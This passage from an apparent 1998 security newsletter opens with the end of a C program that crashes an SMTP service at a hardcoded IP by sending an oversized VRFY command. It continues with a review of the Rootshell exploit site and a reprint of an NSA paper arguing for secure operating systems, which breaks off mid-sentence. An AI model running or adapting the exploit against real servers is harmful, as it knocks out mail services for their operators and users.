arg1[] = "vrfy "; char *sendbuffer; #define CHARACTERS_TO_SEND 475 int main(void) { int thesocket; int counter = 0; struct sockaddr_in foonet; foonet.sin_port = htons(25); foonet.sin_family = AF_INET; foonet.sin_addr.s_addr = inet_addr("209.166.177.36"); // foonet.sin_addr.s_addr = inet_addr("127.0.0.1"); sendbuffer = (char *)malloc(1000); if((thesocket = socket(AF_INET, SOCK_STREAM, 0)) == -1) { perror("Error creating socket"); exit(1); } printf("Connecting to the server...\n"); if(connect(thesocket, (struct sockaddr *)&foonet, sizeof(struct sockaddr)) == -1) { if(errno == ECONNREFUSED) { printf("Connection refused. Most likely someone else has crashed it already.\n"); exit(1); } perror("Unable to connect"); exit(1); } sprintf(sendbuffer, arg1); while(counter != CHARACTERS_TO_SEND) { strcat(sendbuffer, "x"); counter++; } strcat(sendbuffer, "\r\n"); write(thesocket, "helo localhost\r\n", 16); sleep(2); printf("Sending the string...\n"); write(thesocket, sendbuffer, strlen(sendbuffer)); close(thesocket); printf("Done. The service is now toast, and although it may still accept connections,\nit's not working.\n"); } @HWA 65.0 Rootshell.com review ~~~~~~~~~~~~~~~~~~~~ http://www.techsightings.com/cgi-bin/ts_review.pl?52 Hackers and Crackers Go Mainstream Wednesday - 26/Aug/1998 by Robin Miller Since Rootshell went online in mid-1997, I thought of it as a premier hacker/cracker site where break-in exploits (with detailed scripts) got posted for use by others who enjoy this game. But as of August 1998, it's a "Network Security Information Site." I'm sure many professional network security people already read Rootshell at least once a week. More should. Despite its surface turnabout, it's still full of security bug findings, usually with detailed instructions on how to exploit them. Indeed, several Pentagon officials have blamed Rootshell for some of the kid-type hack attempts made against some DoD sites in late 1997 and early 1998. But not everyone in our military establishment is braindead, and by the time the kiddies who follow Rootshell were trying the "Hack the Pentagon" scripts they found there, defenses had been erected -- and all their attempts failed. Rootshell is platform-agnostic. Bug reports and security flaws listed here cover UNIX, Windows and NT, Mac, Linux, FreeBSD, Solaris, and everything else that pops up. There's a mailing list (outbound only, low volume) that keeps you up to date on new info and news, and is well worth subscribing to if you have any interest -- from either direction -- in computer and network security. One last note: Rootshell, even in its new incarnation, still contains this disclaimer, and I'd personally appreciate it if you read and follow it. "By using this site you agree you will use the information on this site for lawful purposes only and will not use this information to gain unauthorized access. Information on this site is for educational purposes ONLY. If you do not agree with this, please leave now." Check it out http://www.rootshell.com/ @HWA 66.0 The inevitability of failure. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 17 December 1998: Stephen Smalley notes: The slides and notes from our presentation at the NISSC for this paper are available at: http://www.cs.utah.edu/~sds/inevit-abs.html. 14 November 1998 Source: http://csrc.nist.gov/nissc/1998/proceedings/paperF1.pdf (62K) Full list of NISSC 98 papers: http://csrc.nist.gov/nissc/1998/papers.html (Link fixed). Thanks to JM/RH. The Inevitability of Failure: The Flawed Assumption of Security in Modern Computing Environments Peter A. Loscocco, Stephen D. Smalley, Patrick A. Muckelbauer, Ruth C. Taylor, S. Jeff Turner, John F. Farrell tos@epoch.ncsc.mil National Security Agency CONTENTS Abstract 1 Introduction 2 The Missing Link Mandatory Security Trusted Path 3 General Examples 3.1 Access Control 3.2 Cryptography 4 Concrete Examples 4.1 Mobile Code 4.2 Kerberos 4.3 Network Security Protocols 4.4 Firewalls 5 System Security 6 Summary 7 References [Contents added to original] Abstract Although public awareness of the need for security in computing systems is growing rapidly, current efforts to provide security are unlikely to succeed. Current security efforts suffer from the flawed assumption that adequate security can be provided in applications with the existing security mechanisms of mainstream operating systems. In reality, the need for secure operating systems is growing in today’s computing environment due to substantial increases in connectivity and data sharing. The goal of this paper is to motivate a renewed interest in secure operating systems so that future security efforts may build on a solid foundation. This paper identifies several secure operating system features which are lacking in mainstream operating systems, argues that these features are necessary to adequately protect general application-space security mechanisms, and provides concrete examples of how current security solutions are critically dependent on these features. Keywords: secure operating systems, mandatory security, trusted path, Java, Kerberos, IPSEC, SSL, firewalls. 1 Introduction Public awareness of the need for security in computing systems is growing as critical services are becoming increasingly dependent on interconnected computing systems. National infrastructure components such as the electric power, telecommunication and transportation systems can no longer function without networks of computers [50]. The advent of the World Wide Web has especially increased public concern for security. Security is the primary concern of businesses which want to use the Internet for commerce and maintaining business relationships [24]. The increased awareness of the need for security has resulted in an increase of efforts to add security to computing environments. However, these efforts suffer from the flawed assumption that security can adequately be provided in application space without certain security features in the operating system. In reality, operating system security mechanisms play a critical role in supporting security at higher levels. This has been well understood for at least twenty five years [2][54][39], and continues to be reaffirmed in the literature [1][35]. Yet today, debate in the research community as to what role operating systems should play in secure systems persists [11]. The computer industry has not accepted the critical role of the operating system to security, as evidenced by the inadequacies of the basic protection mechanisms provided by current mainstream operating systems. The necessity of operating system security to overall system security is undeniable; the underlying operating system is responsible for protecting application-space mechanisms against tampering, bypassing, and spoofing attacks. If it fails to meet this responsibility, system-wide vulnerabilities will result. The need for secure operating systems is especially crucial in today’s computing environment. Substantial increases in connectivity and data sharing have increased the risk to systems such that even a careful and knowledgeable user running on a single-user system is no longer safe from the threat of malicious code. Because the distinction between data and code is vanishing, malicious code may be introduced, without a conscious decision on the part of a user to install executable code, whenever data is imported into the system. For example, malicious code could be introduced with a Java applet or by viewing apparently benign data that, in actuality, contains executable code [32][62]. More so than ever, secure operating systems are needed to protect against this threat. The goal of this paper is to motivate a renewed interest in secure operating systems. By consolidating a number of well-documented examples from the literature, it argues that the threats posed by the modern computing environment cannot be addressed without support from secure operating systems and, as was stated in [8], that any security effort which ignores this fact can only result in a “fortress built upon sand.” Section 2 describes a set of secure operating system features which are typically lacking in mainstream operating systems but are crucial to information security. The need for these features is highlighted in section 3, which examines how application-space access control and cryptography cannot provide meaningful security without a secure operating system. Section 4 provides concrete examples of how security efforts rely on these operating system security features. Section 5 discusses the role of operating system security with respect to overall system security. 2 The Missing Link This section identifies some features of secure operating systems which are necessary to protect application-space security mechanisms yet are lacking in mainstream operating systems. They form the “missing link” of security. Although this section only deals with features, it is important to note that features alone are inadequate. Assurance evidence must be provided to demonstrate that the features meet the desired system security properties and to demonstrate that the features are implemented correctly. Assurance is the ultimate missing link; although approaches to providing assurance may be controversial, the importance of assurance is undeniable. The list of features in this section is not intended to be exhaustive; instead it is merely a small set of critical features that demonstrate the value of secure operating systems. A more complete discussion on secure operating systems, including discussions of assurance, can be found in [25], [59] or [20]. Subsequent sections argue the necessity of these features by describing how application-space security mechanisms and current security efforts employing them are vulnerable in their absence. Mandatory security The TCSEC [20] provides a narrow definition of mandatory security which is tightly coupled to the multi-level security policy of the Department of Defense. This has become the commonly understood definition for mandatory security. However, this definition is insufficient to meet the needs of either the Department of Defense or private industry as it ignores critical properties such as intransitivity and dynamic separation of duty [12][22]. This paper instead uses the more general notion of mandatory security defined in [59], in which a mandatory security policy is considered to be any security policy where the definition of the policy logic and the assignment of security attributes is tightly controlled by a system security policy administrator. Mandatory security can implement organization-wide security policies. Others have referred to this same concept as non-discretionary security in the context of role-based access control [22] and type enforcement [39][7][13].1 ___________________ 1. Actually, long ago, the term non-discretionary controls was used for multi-level security as well [39]. Likewise, as defined in [59], this paper uses a more general notion of discretionary security in which a discretionary security policy is considered to be any security policy where ordinary users may be involved in the definition of the policy functions and/or the assignment of security attributes. Here discretionary security is not synonymous with identity based access control; IBAC, like any other security policy, may be either mandatory or discretionary[58]. An operating system’s mandatory security policy may be divided into several kinds of policies, such as an access control policy, an authentication usage policy, and a cryptographic usage policy. A mandatory access control policy specifies how subjects may access objects under the control of the operating system. A mandatory authentication usage policy specifies what authentication mechanisms must be used to authenticate a principal to the system. A mandatory cryptographic usage policy specifies what cryptographic mechanisms must be used to protect data. Additionally, various sub-systems of the operating system may have their own mechanism usage policies. These subsystem-specific usage policies may be dependent on the cryptographic usage policy. For example, a network usage policy for a router might specify that sensitive network traffic should be protected using IPSEC ESP [4] in tunneling mode prior to being sent to an external network. The selection of a cryptographic algorithm for IPSEC ESP may be deferred to the cryptographic usage policy. A secure system must provide a framework for defining the operating system’s mandatory security policy and translating it to a form interpretable by the underlying mandatory security mechanisms of the operating system. Without such a framework, there can be no real confidence that the mandatory security mechanisms will provide the desired security properties. An operating system which provides mandatory security may nonetheless suffer from the presence of high bandwidth covert channels. This is an issue whenever the mandatory security policy is concerned with confidentiality. This should not, however, be a reason to ignore mandatory security. Even with covert channels, an operating system with basic mandatory controls improves security by increasing the required sophistication of the adversary. Once systems with basic mandatory controls become mainstream, covert channel exploitation will become more common and public awareness of the need to address covert channels in computing systems will increase[57]. In any system which supports mandatory security, some applications require special privileges in the mandatory policy in order to perform some security-relevant function. Such applications are frequently called trusted applications because they are trusted to correctly perform some security-related function and because they are trusted to not misuse privileges required in order to perform that function. If the mandatory security mechanisms of a secure operating system only support coarse-grained privileges, then the security of the overall system may devolve to the security of the trusted applications on the system. To reduce the dependency on trusted applications, the mandatory security mechanisms of an operating system should be designed to support the principle of least privilege. Type enforcement is an example of a mandatory security mechanism which may be used both to limit trusted applications to the minimal set of privileges required for their function and to confine the damage caused by any misuse of these privileges [48][28]. The mandatory security mechanisms of an operating system may be used to support security-related functionality in applications by rigorously ensuring that subsystems are unbypassable and tamperproof. For example, type enforcement may be used to implement assured pipelines to provide these properties. An assured pipeline ensures that data flowing from a designated source to a designated destination must pass through a security-related subsystem and ensures the integrity of the subsystem. Many of the security requirements of these applications may be ensured by the underlying mandatory security mechanisms of the operating system. [48] Operating system mandatory security mechanisms may also be used to rigorously confine an application to a unique security domain that is strongly separated from other domains in the system. Applications may still misbehave, but the resulting damage can now be restricted to within a single security domain. This confinement property is critical to controlling data flows in support of a system security policy [33]. In addition to supporting the safe execution of untrustworthy software, confinement may support functional requirements, such as an isolated testing environment or an insulated development environment [48]. For example both the Sidewinder firewall and the DTE firewall use type enforcement for confinement [6][12]. Although one could attempt to enforce a mandatory security policy through discretionary security mechanisms, such mechanisms can not defend against careless or malicious users. Since discretionary security mecha-nisms place the burden for security on the individual users, carelessness by any one user at any point in time may lead to a violation of the mandatory policy. In con-trast, mandatory security mechanisms limit the burden to the system security policy administrator. With only discretionary mechanisms, a malicious user with access to sensitive data and applications may directly release sensitive information in violation of the mandatory policy. Although that same user may also be able to leak sensitive information in ways that do not involve the computing system, the ability to leak the information through the computing system may increase the bandwidth of the leak and may decrease its traceability. In contrast, with mandatory security mechanisms, he may only leak sensitive information through covert channels, which limits the bandwidth and increases accountability, if covert channels are audited. Furthermore, even with users who are benign and careful, the mandatory security policy may still be subverted by flawed or malicious applications when only discretionary mechanisms are used to enforce it.2 The distinction between flawed and malicious software is not particularly important in this paper. In either case, an application may fail to apply security mechanisms required by the mandatory policy or may use security mechanisms in a way that is inconsistent with the user’s intent. Mandatory security mechanisms may be used to ensure that security mechanisms are applied as required and can protect the user against inadvertent execution of untrustworthy applications. Although the user may have carefully defined the discretionary policy to properly implement the mandatory policy, an application may change the discretionary policy without the user’s approval or knowledge. In contrast, the mandatory policy may only be changed by the system security policy administrator. _________________ 2. A discussion of the formal limitations of discretionary security mechanisms appears in [29]. In the case of personal computing systems, where the user may be the system security policy administrator, mandatory security mechanisms are still helpful in protecting against flawed or malicious software. In the simplest case, where there is only a distinction between the user’s ordinary role and the user’s role as system security policy administrator, the mandatory security mechanisms can protect the user against unintentional execution of untrustworthy software. With a further sub-division of the user’s ordinary role into various roles based on function, mandatory security mechanisms can confine the damage that may be caused by flawed or malicious software. Although there are a number of commercial operating systems with support for mandatory security, none of these systems have become mainstream. These systems have suffered from a fixed notion of mandatory security, thereby limiting their market appeal. Furthermore, these systems typically lack adequate support for constraining trusted applications. In order to reach a wider market, operating systems must support a more general notion of mandatory security and must support flexible configuration of mandatory policies. Mainstream commercial operating systems rarely support the principle of least privilege even in their discretionary access control architecture. Many operating systems only provide a distinction between a completely privileged security domain and a completely unprivileged security domain. Even in Microsoft Windows NT, the privilege mechanism fails to adequately protect against malicious programs because it does not limit the privileges that a program inherits from the invoking process based on the trustworthiness of the program [65]. Current microkernel-based research operating systems have tended to focus on providing primitive protection mechanisms which may be used to flexibly construct a higher-level security architecture. Many of these systems, such as the Fluke microkernel [23] and the Exokernel [41], use kernel-managed capabilities as the underlying protection mechanism. However, as discussed in [59], typical capability architectures are inadequate for supporting mandatory access controls with a high degree of flexibility and assurance. L4 [38] provides some support for mandatory controls through its clans and chiefs mechanism and its IPC mechanism for identifying senders and receivers but still lacks a coherent framework for using these mechanisms to meet the requirements of a mandatory policy. Furthermore, L4 assumes that there will only be a small number of distinct security domains [38]. Flask [56], a variant of the Fluke microkernel, provides a mandatory security framework similar to that of DTOS [43], a variant of the Mach microkernel; both systems provide mechanisms for mandatory access control and a mandatory policy framework. Trusted path A trusted path is a mechanism by which a user may directly interact with trusted software, which can only be activated by either the user or the trusted software and may not be imitated by other software [20]. In the absence of a trusted path mechanism, malicious software may impersonate trusted software to the user or may impersonate the user to trusted software. Such malicious software could potentially obtain sensitive information, perform functions on behalf of the user in violation of the user’s intent, or trick the user into believing that a function has been invoked without actually invoking it. In addition to supporting trusted software in the base system, the trusted path mechanism should be extensible to support the subsequent addition of trusted applications by a system security policy administrator [28]. The concept of a trusted path can be generalized to include interactions beyond just those between trusted software and users. The TNI introduces the concept of a trusted channel for communication between trusted software on different network components [44]. More generally, a mechanism that guarantees a mutually authenticated channel, or protected path, is necessary to ensure that critical system functions are not being spoofed. Although a protected path mechanism for local communications could be constructed in application space without direct authentication support in the operating system, it is preferable for an operating system to provide its own protected path mechanism since such a mechanism will be simpler to assure [59] and is likely to be more efficient. Most mainstream commercial operating systems are utterly lacking in their support for either a trusted path mechanism or a protected path mechanism. Microsoft Windows NT does provide a trusted path for a small set of functions such as login authentication and password changing but lacks support for extending the trusted path mechanism to other trusted applications [65]. For local communications, NT does provide servers with the identity of their clients; however, it does not provide the server identity to the client. 3 General Examples This section argues that without operating system support for mandatory security and trusted path, application-space mechanisms for access control and cryp-tography cannot be implemented securely. These arguments will then be used to reinforce the discussion in section 4, which analyzes concrete examples. 3.1 Access Control An application-space access control mechanism may be decomposed into an enforcer component and a decider component. When a subject attempts to access an object protected by the mechanism, the enforcer component must invoke the decider component, supplying it with the proper input parameters for the policy decision, and must enforce the returned decision. A common example of the required input parameters is the security attributes of the subject and the object. The decider component may also consult other external sources in order to make the policy decision. For example, it may use an external policy database and system information such as the current time. If a malicious agent can tamper with any of the components in the access control mechanism or with any inputs to the decision, then the malicious agent can subvert the access control mechanism. Even if the components and all of the inputs are collocated within a single file, the operating system security mechanisms are still relied upon to protect the integrity of that file. As discussed in the prior section, only mandatory security mechanisms can rigorously provide such integrity guarantees. Even with strong integrity guarantees for the policy decision inputs, if an authorized user invokes malicious software, the malicious software could change an object’s security attributes or the policy database’s rules without the user’s knowledge or consent. The access control mechanism requires a trusted path mechanism in the operating system in order to ensure that arbitrary propagation of access cannot occur without explicit authorization by a user. If a malicious agent can impersonate the decider component to the enforcer component, or if a malicious agent can impersonate any source of inputs to the decision, then the malicious agent can subvert the mecha-nism. If any of the components or external decision input sources are not collocated within a single application, then the access control mechanism requires a protected path mechanism. If a malicious agent can bypass the enforcer component, then it may trivially subvert the access control mechanism. Mandatory security mechanisms in the operating system may be used to ensure that all accesses to the protected objects are mediated by the enforcer component. 3.2 Cryptography An analysis of application-space cryptography may be decomposed into an analysis of the invocation of the cryptographic mechanism and an analysis of the cryptographic mechanism itself. The analysis of this section draws from the discussions in [51][15] [60][61][55][52]. As an initial basis for discussion, suppose that the cryptographic mechanism is a hardware token that implements the necessary cryptographic functions correctly and that there is a secure means by which the cryptographic keys are established in the token. Even in this simplified case, where the confidentiality and integrity of algorithms and keys is achieved without operat-ing system support, this section will demonstrate that there are still vulnerabilities which may only be effectively addressed with the features of a secure operating system. One vulnerability in this simplified case is that invocation of the token cannot be guaranteed. Any legitimate attempt to use the token might not result in a call to the token. The application that performs the cryptographic invocation might be bypassed or modified by malicious applications or malicious users. Malicious applications might impersonate the cryptographic token to the invoking application. Mandatory security and protected path features in the operating system address this vulnerability. Mandatory security mechanisms may be used to ensure that the application that invokes the cryptographic token is unbypassable and tamperproof against both malicious software and malicious users. Unbypassability could also be achieved by using an inline cryptographic token, which is physically interposed between the sender of the data to be protected and the receiver of the protected data; however, this would be less flexible. A protected path mechanism may be used to ensure that malicious software cannot impersonate the cryptographic token to the invoking application. Misuse of the cryptographic token is a second vulnerability in the simplified case. Misuse may involve the use of a service, algorithm, session or key by an unauthorized application. Without operating system support for identifying callers, a cryptographic token can do little more than require that a user activate it, after which, any service, algorithm, session or key authorized for that user may be used by any application on the system. In this case, the cryptographic token may be misused by applications operating on behalf of other users or may be misused by malicious software operating on behalf of the authorized user. Furthermore, unless the cryptographic token has a direct physical interface for user activation, malicious software can spoof the token to the user, obtain authentication information, and subsequently activate the cryptographic token without the user’s knowledge or consent. Even with a direct physical interface to the user, it is impractical for the cryptographic token to require user confirmation for every cryptographic operation. This second vulnerability may be addressed through mandatory security, trusted path and protected path features in the operating system. A trusted path mechanism obviates the need for a separate physical interface for activation. A protected path mechanism permits the cryptographic token to identify its callers and enforce fine-grained controls over the use of services, algorithms, sessions and keys. As an alternative to having the token deal with fine-grained controls over its usage, mandatory security mechanisms may also be used to provide such controls. For example, mandatory security mechanisms may be used to isolate the token for use only by applications executed by the user who activated the token. Furthermore, the mandatory security mechanisms can reduce the risk of malicious software being able to use the cryptographic token and may consequently limit the use of the trusted path mechanism to highly sensitive actions. Hence, even in the simplest case, the features of a secure operating system are crucial to addressing the vulnerabilities of application-space cryptography. In the remainder of this section, the assumptions of the simplified case are removed, and the additional vulnerabilities are examined. If the assumption that initial keys are securely established within the token is removed, then there is the additional vulnerability that the initial keys may be observed or modified by an unauthorized entity. Unless the initial keys are provided via a dedicated physical interface to the cryptographic token, the operating system must protect the path between the initial key source and the cryptographic token and may need to protect the initial key source itself. Mandatory security mechanisms may be used to rigorously protect the path and the key source. A trusted path may be required for initial keying. If the assumption that the cryptographic mechanism is confined to a single hardware token is removed and implemented in software instead, the confidentiality and integrity of the cryptographic mechanism’s code and data becomes dependent on the operating system, including both memory protection and file protection. Mandatory security is needed to rigorously ensure the mechanism’s integrity and confidentiality. If any external inputs, such as input parameters to a random number generator, are used by the cryptographic mechanism, the input sources and the path between the input sources and the cryptographic mechanism must be protected with mandatory security mechanisms. 4 Concrete Examples This section further demonstrates that secure operating systems are necessary by showing that some widely accepted security solutions critically rely on the features of secure operating systems. In particular, this section examines mobile code security efforts, the Kerberos network authentication system, firewalls and network security protocols. 4.1 Mobile Code A number of independently-developed security solutions for the World Wide Web, each with its own protection model, have been developed to protect against the threats from malicious mobile code. However, systems relying on these security solutions are vulnerable because of a lack of operating system support for security. Primarily, this section will emphasize this point by focusing on efforts to secure Java [27], but other efforts will also be used to highlight issues. The primary threat that these solutions attempt to address is the threat of hostile mobile code gaining unauthorized access to a user’s files and resources in order to compromise confidentiality or integrity. The threat is not limited to interpreted applets loaded from the network by a web browser; both [26] and [30] extend this threat model to include helper applications which may have been actively installed by a user. There is little distinction between mobile code and what is traditionally considered data. For example, consider that Postscript documents are actually programs with potential access to the local filesystem. Consequently, helper applications which operate on untrustworthy data, such as Postscript viewers, must either be executed in a less flexible mode of operation, or must be carefully confined by the operating system. The basic Java Security Model is based on the notion of “sandboxing.” The system relies on the type-safety of the language in conjunction with the Java Security Manager to prevent unauthorized actions [27]. Efforts are currently underway to add additional security features to Java, such as capabilities, an expanded access control model, or additional controls over access to certain class libraries [70]. The fundamental limitation of these approaches is that none can be guaranteed to be tamperproof or unbypassable. For example, although the Java language is claimed to be secure, the Java Virtual Machine (JVM) will accept byte code which violates the language semantics and which can lead to security violations [32]. JVM implementation errors have led to violations of the language’s semantics [19]. A significant portion of the Java system is currently in the form of native methods which are implemented as object code and are not subject to the JVM’s type-safety checks. The JVM is not able to protect itself from tampering by other applications. Finally, the Java security model can offer no protection from the many other forms of malicious mobile code. In [30], the authors call for trusted systems to support a system-wide solution to address the threats presented by non-Java code. Even if such problems with the JVM did not exist, these security solutions would still suffer from the fundamental limitation that they rely on application-space access control for security. They all depend on the local file system to preserve the integrity of the system code, including class files. All of the systems which store policy locally depend on file system access control to preserve the integrity of the policy files. Section 3.1 demonstrated the importance of secure operating system features for supporting application-space access control. Another popular approach to “securing” mobile code is to require digitally signed applets and limit execution to those originating from trusted sources [27]. In fact, native ActiveX security is based entirely on digital signatures, as it has no form of access control [24][27]. The basic flaw with this approach is that it is an all-or-nothing proposition; the user cannot constrain a native ActiveX control to a limited security domain. Mandatory security mechanisms in the operating system may be used for this purpose, by confining the browser to a distinct security domain. Note that, although not sufficient by themselves, digital signatures will play an important part in mobile code security, even on secure operating systems. They can reduce the risk of malicious code entering the system, provide some measure of trust that an applet will behave properly, and provide another piece of information to use in making an access control decision. However, as with the general application-space cryptography described in section 3.2, the digital signature verification mechanism depends on secure operating system features to guarantee invocation, to protect the integrity of the mechanism, and to protect the integrity of the locally cached public keys. The need for an operating system trusted path mechanism was highlighted by [67] which demonstrates the ease with which a trojan horse applet can capture credit card numbers, PIN numbers or passwords by perfectly emulating a window system dialog box. The proposed solution was an ad hoc user-level trusted path mechanism which required a user to customize his dialog box with a complicated graphical pattern. This solution is not adequate as it only increases the sophistication required in the trojan horse. Other systems attempt to provide alternative security solutions to the mobile code threat. The Janus system [26] interposes on Solaris system calls to constrain untrusted native applications, and Safe-Tcl [49] provides a “safe interpreter” which attempts to limit the command set available to untrusted code. However, like the Java security solutions, these systems are subject to the same vulnerabilities as any other application-space access control mechanism; consequently, they require secure operating system support. Beyond enabling all of the mobile code systems mentioned above to function securely, a secure system could also simplify them. Rather than implementing their security primitives in application space where they are vulnerable, they could utilize the system security services to provide a better overall system. A properly designed secure system would provide a flexible, economic foundation with one consistent security model for all of the different virtual machine efforts to use. 4.2 Kerberos Kerberos [31][47] is a network authentication service originally developed for Project Athena at MIT. In addition to providing an authentication service, Kerberos supports the establishment of session keys to support network confidentiality and integrity services. Derivatives of Kerberos have been used to provide authentication and key establishment services for AFS [64], DCE [53], and ONC RPC [21]. Kerberos and systems that rely on Kerberos have been suggested as a means of providing security for the World Wide Web [18][36][37]. Kerberos is based on symmetric cryptography with a trusted key distribution center (KDC) for each realm. The Kerberos KDC has access to the secret key of every principal in its realm. Consequently, a compromise of the KDC can be catastrophic. This is generally addressed by requiring that the KDC be both physically secure and dedicated solely to running the Kerberos authentication server [46].3 A typical environment also uses physically-secure dedicated systems for the servers using Kerberos. Without these environmental assumptions, the Kerberos authentication service and the Kerberized server applications would require secure operating system features to rigorously ensure that they are tamperproof and unbypassable. For the sake of argument, the remainder of this section will consider these environmental assumptions to be true and focus only on the security of the client workstations. ___________________ 3. Variants of Kerberos have been proposed that use asymmetric cryptography either to reduce the cost incurred by a penetration of the KDC or to completely eliminate the need for the KDC [63] [66][42][18]. Kerberos was designed for an environment where the client workstations and the network are assumed to be completely untrustworthy [10][45]. However, since the software on the client workstation mediates all interactions between its user and the Kerberized server applications, this assumption implies that the Kerberized server applications must view all client applications as potentially malicious software. Furthermore, a Kerberized server application has no means of establishing a trusted path to a user on a client workstation, since that would require trusted code on the client workstation. Thus, in a system that uses Kerberos, malicious software executed by a user is free to arbitrarily modify or leak a user’s information, with no means of confinement; no distinctions between a user’s legitimate requests and the requests of malicious software are possible. Given the increasing ease with which malicious software may be introduced into a system, the Kerberos environmental model seems untenable. As noted in [14], secure end-to-end transactions require trusted code at both end points. As a basis of further discussion, suppose that there is a base set of trustworthy software on the client work-stations which is protected against tampering, but that the client workstation operating system still lacks mechanisms for mandatory security and trusted path. Furthermore, suppose that the client workstation is a single-user system which does not export any services to other systems. In spite of these assumptions, a user is still vulnerable to attacks by malicious software, such as mobile code downloaded by the user. If the malicious software could spoof the client-side authentication program to the user, then it may be able to obtain a user’s password. Even with one-time passwords, this attack would permit the malicious software to act on behalf of the user during the login session. A trusted path mechanism in the client workstation’s operating system can be used to prevent such an attack. Additionally, such a trusted path mechanism in combination with support for a network protected path can be used to provide a trusted path between users and server applications. If the malicious software can read the files used by the Kerberos client software to store tickets and session keys, then the malicious software may directly impersonate the user to the corresponding Kerberized server applications. Even if the session keys are encapsulated within a hardware cryptographic token, the malicious software can invoke the cryptographic token on behalf of the user, exploiting the misuse vulnerability discussed in section 3.2. Mandatory security mechanisms can be used to rigorously protect either the file or the cryptographic token against access by malicious software. 4.3 Network Security Protocols The IPSEC network security protocols [5][3][4] are used to provide authentication, integrity, and confidentiality services at the IP layer. Typical implementations of the IPSEC protocols rely on application-space key management servers to perform key exchanges and supply keys for security associations. The IPSEC module in the network stack communicates with the local key management server via upcalls to retrieve the necessary information. SSL [69] is another network security protocol that provides authentication, integrity, and confidentiality services and a negotiation service for keys and cryptographic algorithms. SSL, however, is implemented entirely in application space and requires no kernel modifications. SSL has been implemented as a library that interposes on socket calls to incorporate the SSL protocol between the underlying transport protocol of the socket (e.g., TCP) and the application protocol (e.g., HTTP). Since it relies on application-space cryptography, the key management server used by IPSEC is subject to the vulnerabilities described in section 3.2 and requires mandatory security mechanisms in the operating system for adequate protection. In turn, since the protection provided by IPSEC depends on the protection of the keys, mandatory security mechanisms in the operating system are also crucial to meeting the security requirements of IPSEC. Since the complete SSL implementation operates in application space, it is directly subject to the vulnerabilities described in section 3.2 and requires mandatory security mechanisms in the operating system for adequate protection. Both IPSEC and SSL are intended to provide secure channels. However, as noted in [14], an end-to-end secure transaction requires a secure channel and secure end points. If an attacker can penetrate one of the end points and directly access the unprotected data, then the protection provided by IPSEC and SSL is only illusory. 4.4 Firewalls A network firewall is a mechanism for enforcing a trust boundary between two networks. The analysis of this section is based on the discussions in [17][9][11][6]. Commonly, firewalls are used to maintain a separation between insiders and outsiders for an organization’s computing resources. Internal firewalls may also be used to provide separation between different groups of insiders or to provide defense-in-depth against outsiders. Modern firewall architectures typically involve the use of bastion hosts; in a screened subnet architecture, there may be an external bastion host on a perimeter network, which is highly exposed to outsiders, and an internal bastion host on the internal network, which is exposed to the external bastion host. The security of the bastion hosts is crucial to the security provided by the firewall. To reduce risk, bastion hosts are typically dedicated systems, only providing the minimal services required. Even with such minimal configuration, flaws in the proxy servers on the bastion host may permit penetration. However, mandatory security mechanisms in the operating systems of the bastion hosts may be used to confine proxy servers so that penetrations are narrowly limited. Similarly, the bastion host’s mandatory security mechanisms may be used to protect proxy servers against tampering. Firewalls provide no protection against malicious insiders. Typically, insiders can easily leak information through the firewall. Malicious insiders can construct tunnels to permit outsiders to perform inbound calls through the firewall or may provide ways of bypassing a firewall entirely. Additionally, malicious insiders can exploit data leaked between users within the firewall. Although internal firewalls may be used to partition insiders into multiple trust classes, the granularity of protection is quite limited in comparison to what can be provided by a secure operating system. The ability of malicious insiders to leak data through the firewall can be confined by mandatory security mechanisms in the operating systems of the internal hosts. Likewise, mandatory security mechanisms in the operating systems of the internal hosts can confine outsiders who perform inbound calls through tunnels constructed by a malicious insider to the security domains in which the malicious insider is allowed to operate. In addition to the threat of malicious insiders, a firewall is at risk from the threat of malicious software executed by benign insiders. Typically, firewalls do not require that insiders strongly authenticate themselves to the firewall in order to access external services through the firewall [40]. Hence, if a benign insider executes malicious software on an internal host, the malicious software may seek to subvert the protection of the firewall in the same fashion as a malicious insider. An example of using a malicious Java applet to enable outsiders to penetrate a firewall is given in [40]. Even if insiders are required to strongly authenticate themselves to the firewall, a benign insider may still execute a trojan horse whose overt purpose requires external access; in this case, the malicious software may still subvert the protection of the firewall. Mandatory security mechanisms in the operating systems of the internal hosts may be used to protect users against execution of malicious software or to confine such software when it is executed. If strong authentication is required prior to accessing external services, mandatory security mechanisms could be used to ensure that only trustworthy software on the internal hosts can communicate with the strong authentication mechanism on the firewall. In any case, the mandatory security mechanisms would limit the ability of malicious software to leak information or support inbound calls. Firewalls are also susceptible to malicious data attacks [62]. Some example malicious data attacks relevant to firewalls are described in [68][40][16]. As with malicious insiders and malicious software, mandatory security mechanisms in the operating systems of the bastion hosts and the internal hosts may be used to confine malicious data attacks. When inbound services are supported by a firewall, the firewall itself cannot protect the remote system against compromise. The remote system’s operating system must protect against misuse of the allowed inbound services and must protect any information acquired through the inbound service against leakage. Mandatory security mechanisms in the remote system’s operating system may be used to provide such protection. Additionally, mandatory security mechanisms in the internal host’s operating system are needed to confine any attack from a penetrated remote system. When a benign insider wishes secure access to a remote service, the firewall itself cannot provide complete protection for the use of the remote service. The internal host’s operating system must protect against any attempts by the server to trick the client into misusing its privileges, as in the case where a browser executes a malicious applet provided by a server; mandatory security mechanisms in the internal host’s operating system may be used to confine these client applications. 5 System Security No single technical security solution can provide total system security; a proper balance of security mechanisms must be achieved. Each security mechanism provides specific security functions and should be designed to only provide those functions. It should rely on other mechanisms for support and for required security services. In a secure system, the entire set of mechanisms complement each other so that they collectively provide a complete security package. Systems that fail to achieve this balance will be vulnerable. As has been shown throughout this paper, a secure operating system is an important and necessary piece to the total system security puzzle, but it is not the only piece. A highly secure operating system would be insufficient without application-specific security built upon it. Certain problems are actually better addressed by security implemented above the operating system. One such example is an electronic commerce system that requires a digital signature on each transaction. A application-space cryptographic mechanism in the transaction system protected by secure operating system features might offer the best system security solution. No single security mechanism is likely to provide complete protection. Unsolved technical problems, implementation errors and flawed environmental assumptions will result in residual vulnerabilities. As an example, covert channels remain a serious technical challenge for secure operating system designers. These limitations must be understood, and suitable measures must be taken to deploy complementary mechanisms designed to compensate for such problems. In the covert channel example, auditing and detection mechanisms should be utilized to minimize the chances that known channels are exploited. In turn, these should depend on secure operating systems to protect their critical components, such as audit logs and intrusion sensors, because they are subject to the same types of vulnerabilities as those discussed throughout this paper. 6 Summary This paper has argued that the threats posed by the modern computing environment cannot be addressed without secure operating systems. The critical operating system security features of mandatory security and trusted path have been explained and contrasted with the inadequate protection mechanisms of mainstream operating systems. This paper has identified the vulnerabilities that arise in application-space 